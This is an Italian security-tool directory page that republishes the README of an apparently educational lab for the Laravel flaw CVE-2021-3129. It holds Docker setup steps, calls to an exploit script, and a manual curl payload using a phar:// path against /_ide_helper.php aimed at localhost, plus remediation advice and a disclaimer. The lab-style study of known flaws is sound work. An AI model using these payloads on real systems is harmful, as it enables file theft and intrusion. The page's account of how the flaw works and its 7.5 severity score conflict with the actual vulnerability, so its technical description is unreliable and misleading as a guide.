Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: RCE in Modalità Debug di Laravel - Laboratorio di sfruttamento completo con exploit in Python, container Docker e guida all'analisi di sicurezza. | Kitploit
Strumenti/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: RCE in Modalità Debug di Laravel - Laboratorio di sfruttamento completo con exploit in Python, container Docker e guida all'analisi di sicurezza.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

CVE-2021-3129: Laboratorio RCE in Modalità Debug Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

Laboratorio pratico per lo sfruttamento di CVE-2021-3129 - una vulnerabilità critica di Laravel che consente la lettura non autenticata di file e un potenziale RCE.

Avvio Rapido

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Cos'è CVE-2021-3129?

Come Funziona

  1. Ricognizione - Identificare Laravel con la modalità debug abilitata
  2. Validazione - Testare l'endpoint /_ide_helper.php
  3. Sfruttamento - Utilizzare il wrapper phar:// per leggere i file
  4. Impatto - Estrarre credenziali, chiavi API e variabili d'ambiente

Prerequisiti

  • Docker Desktop
  • Python 3.8+
  • 4GB RAM

Configurazione (Passo dopo Passo)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Output Atteso

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

Utilizzo dell'Exploit

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

Test Manuale

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Correzione

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

Pulizia

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

FAQ

D: Posso testare su internet?
R: No. Questo è solo per localhost. Non testare mai su sistemi che non possiedi.

D: Funzionerà sulle versioni patchate?
R: No. Laravel 8.4.2+ e 7.30.4+ sono state corrette.

D: Posso modificare l'exploit?
R: Sì. Il codice è completamente commentato per l'apprendimento.

D: Come posso catturare il traffico di rete?
R: Usa tcpdump o Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

Avviso Legale

⚠️ Solo a scopo educativo

✅ Usi Autorizzati:

  • Apprendimento formativo
  • Test di sicurezza autorizzati
  • Ricerca difensiva

❌ Usi Proibiti:

  • Accesso non autorizzato ai sistemi
  • Hacking illegale
  • Danni ai sistemi

Utilizza solo su sistemi di tua proprietà o per cui hai ricevuto esplicito permesso di test.

Risorse

  • CVE-2021-3129
  • Sicurezza Laravel
  • Wrapper PHP

Autore

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Località: Bengaluru, Karnataka, India

Licenza

Licenza MIT - Vedi il file LICENSE

Scarica lo strumento
ProprietàDettagli
GravitàCVSS 7.5 (Alta)
Versioni interessateLaravel < 8.4.2, < 7.30.4
ImpattoLettura arbitraria di file, divulgazione di informazioni, potenziale RCE
Autenticazione richiestaNo
Vettore di attaccoRete